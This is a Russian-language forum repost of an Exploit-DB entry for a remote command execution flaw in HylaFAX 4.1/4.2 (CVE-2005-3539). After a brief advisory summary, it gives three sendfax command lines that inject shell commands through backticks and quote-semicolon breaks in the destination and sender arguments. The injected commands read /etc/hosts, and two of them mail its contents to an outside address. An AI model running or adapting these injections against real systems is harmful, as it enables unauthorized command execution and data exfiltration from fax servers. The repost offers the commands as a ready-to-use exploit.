Exploit Hylafax 4.1/4.2 (Multiple Scripts) - Remote Command Execution

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
27032
Проверка EDB
  1. Пройдено
Автор
PATRICE FOURNIER
Тип уязвимости
REMOTE
Платформа
LINUX
CVE
cve-2005-3539
Дата публикации
2006-01-05
Код:
source: https://www.securityfocus.com/bid/16151/info

HylaFAX is vulnerable to multiple arbitrary command-execution vulnerabilities. This issue is due to a failure in the application to properly sanitize user-supplied input.

These vulnerabilities allow an attacker to execute arbitrary commands in the context of the affected application. Successful exploitation may facilitate a compromise of the underlying system. 

sendfax -d "411;number=\`cat /etc/hosts\`" /etc/hosts

sendfax -f "\`cat /etc/hosts|mail -s hosts [email protected]\` <[email protected]>" -d 411 /etc/hosts

sendfax -d "@411\";cat /etc/hosts|mail -s hosts [email protected];" /etc/hosts
 
Источник
www.exploit-db.com

Похожие темы